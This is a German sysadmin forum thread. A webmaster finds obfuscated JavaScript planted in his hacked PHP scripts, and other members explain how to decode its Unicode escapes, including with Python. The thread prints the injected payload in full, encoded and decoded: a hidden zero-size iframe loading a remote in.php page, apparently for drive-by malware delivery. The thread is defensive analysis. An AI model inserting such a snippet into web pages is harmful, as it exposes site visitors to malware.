Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Was bedeutet das bzw. was kann ich bei sowas lesbar machen

Mitglied: 35801

35801 (Level 1)

08.04.2009, aktualisiert 13.05.2009, 4829 Aufrufe, 9 Kommentare

Ich habe ein einer meiner PHP Scripte folgendes gefunden...
01.
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
Mitglied: Woolfsmann
08.04.2009 um 14:08 Uhr
Hi,

nach einer kurzen google suche komm denke ich das hier hilft dir.

http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687

gruß
Woolfsmann
Bitte warten ..
Mitglied: 35801
08.04.2009 um 14:15 Uhr
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??

Ich müsste wissen was das macht.
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 14:41 Uhr
Hi,

Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:
01.
<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe>
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.

lg,
Slainte
Bitte warten ..
Mitglied: 35801
08.04.2009 um 15:54 Uhr
OK Danke!

Aber wie hast du das decodiert?

Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Bitte warten ..
Mitglied: miniversum
08.04.2009 um 16:09 Uhr
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit
<iframe src=

miniversum
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 16:11 Uhr
oder Du ersetzt das "document.write" einfach durch ein "alert"
Bitte warten ..
Mitglied: Biber
08.04.2009 um 16:17 Uhr
Moin diaz1983,

diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.

Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:

\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.

Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:18 Uhr
Hab noch ne nette Methode gefunden...

Zumindest mit Python ging das ganz einfach auf meinem Fedora-System

01.
[peter@fedoraPC ~]# python 
02.
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38)  
03.
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2 
04.
Type "help", "copyright", "credits" or "license" for more information. 
05.
 
06.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e" 
07.
<iframe  src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:21 Uhr
OK Danke...

Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Bitte warten ..
Ähnliche Inhalte
Microsoft Office
Was genau bedeutet
Frage von ImTrainingMicrosoft Office2 Kommentare

Guten Morgen, Weiß einer was diese Fehlermeldung zu bedeuten hat? Sie taucht in einem Programm namens Nova Nota auf ...

Entwicklung
Was bedeutet persistent?
Frage von Heinz0815Entwicklung5 Kommentare

Hi, Was versteht man unter persistent? Z.b. Aufgezeichnete Daten dürfen nicht persistent sein. Grüße Heini

Switche und Hubs
Was genau bedeutet Port Mirroring?
gelöst Frage von windelterroristSwitche und Hubs7 Kommentare

Morgen Ich hab da so ne Frage an euch :) Ich sollte bei einem NETGEAR ProSafe 8 Port Gigabit ...

Windows 10

"moveextract"-Command? Gibt es sowas?

gelöst Frage von 1410640014Windows 104 Kommentare

Hallo, leider war der Vorgänger-Admin in seiner Verzeichnisorganisation nicht sehr sorgfältig. Da sind 100te EXE-Dateien, ZIPs mit Treibern und ...

Neue Wissensbeiträge
Humor (lol)
IoT-Gefahr: Smartes Aquarium leckt!
Information von Lochkartenstanzer vor 2 StundenHumor (lol)3 Kommentare

Moin, Die IoT-Manie hat weitere Opfer gefunden. Ein Casino-Leck durch ein smartes Aquarium: Allerdings haben sie kein Wasser, sondern ...

Router & Routing

Olle Fritzbox 7270 mit VPN und SIP-Telefonie hinter O2 Homebox 6641 als "Modem"

Erfahrungsbericht von the-buccaneer vor 11 StundenRouter & Routing3 Kommentare

Nun war es soweit: Auch O2 hat mich mit VOIP zwangsbeglückt. Heute am Privatanschluss, in 2 Wochen ist das ...

Sicherheit

Ungepatchte Remote Code Execution-Lücke in LG NAS

Information von kgborn vor 1 TagSicherheit

Nutzt wer LG NAS-Einheiten? In den NAS-Einheiten der LG Network Storage-Einheiten gibt es eine sehr unschöne Schwachstelle, die einen ...

Windows Update

Neue Version KB4099950 NIC Einstellungen gehen verloren

Information von sabines vor 1 TagWindows Update2 Kommentare

Es ist eine neue Version des KB4099950 verfügbar, die das Problem mit den verlorenen Netzwerkeinstellungen lösen soll. Das Datum ...

Heiß diskutierte Inhalte
LAN, WAN, Wireless
OpenVPN Client Fehlermeldungen
Frage von chris84LAN, WAN, Wireless14 Kommentare

Hallo Zusammen, wir nutzen seit kurzem einen neuen Router und den OpenVPN Client. Die VPN Verbindung klappt; allerdings kommen ...

Sonstige Systeme
Wie Normenkataloge im Unternehmen bereit stellen?
Frage von MuzzepuckelSonstige Systeme14 Kommentare

Hallo Kollegen, ich lese schon lange hier mit, nun mein ersrer Beitrag, bzw. Frage. :-) Wir benötigen für unsere ...

Sicherheit
Verbindliche Zustellung per E-Mail?
Frage von ahussainSicherheit14 Kommentare

Hallo allerseits, ein Kunde von mir nutzt intensiv Fax. Hauptgrund: zusammen mit einer Empfangsbestätigung ist eine verbindliche Zustellung gewährleistet. ...

Netzwerke
Gateway in Switches, Druckern ect eintragen oder nicht
Frage von JodelknutNetzwerke12 Kommentare

Hi, bisher habe ich immer das Gateway überall wo es verlangt oder eintragbar war auch eingetragen. Mein neuer Kollege ...